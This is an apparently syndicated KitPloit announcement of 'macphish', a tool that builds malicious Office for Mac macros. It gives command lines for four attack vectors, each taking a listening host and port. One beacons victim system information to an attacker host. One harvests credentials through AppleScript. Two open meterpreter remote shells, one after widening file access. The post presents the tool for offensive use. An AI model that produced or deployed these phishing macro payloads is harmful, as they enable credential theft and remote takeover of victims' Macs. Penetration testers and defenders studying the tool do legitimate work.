Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all articles
Browse latest Browse all 5816

macphish - Office for Mac Macro Payload Generator

$
0
0

Office for Mac Macro Payload Generator.

Attack vectors
There are 4 attack vectors available:
  • beacon
  • creds
  • meterpreter
  • meterpreter-grant
For the 'creds' method, macphish can generate the Applescript script directly, in case you need to run it from a shell.

beacon
On execution, this payload will signal our listening host and provide basic system information about the victim. The simplest way of generating a beacon payload is:
$./macphish.py -lh <listening host> 
By default, it uses curl but other utilities (wget, nslookup) can be used by modifying the command template.

creds
$./macphish.py -lh <listening host> -lp <listening port> -a creds

meterpreter
The simplest way of generating a meterpreter payload is:
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter 

meterpreter-grant
The generate a meterpreter payload that calls GrantAccessToMultipleFiles() first:
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant
For meterpreter attacks, only python payloads are supported at the moment.

Usage
See https://github.com/cldrn/macphish/wiki/Usage

PoCs


Viewing all articles
Browse latest Browse all 5816

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>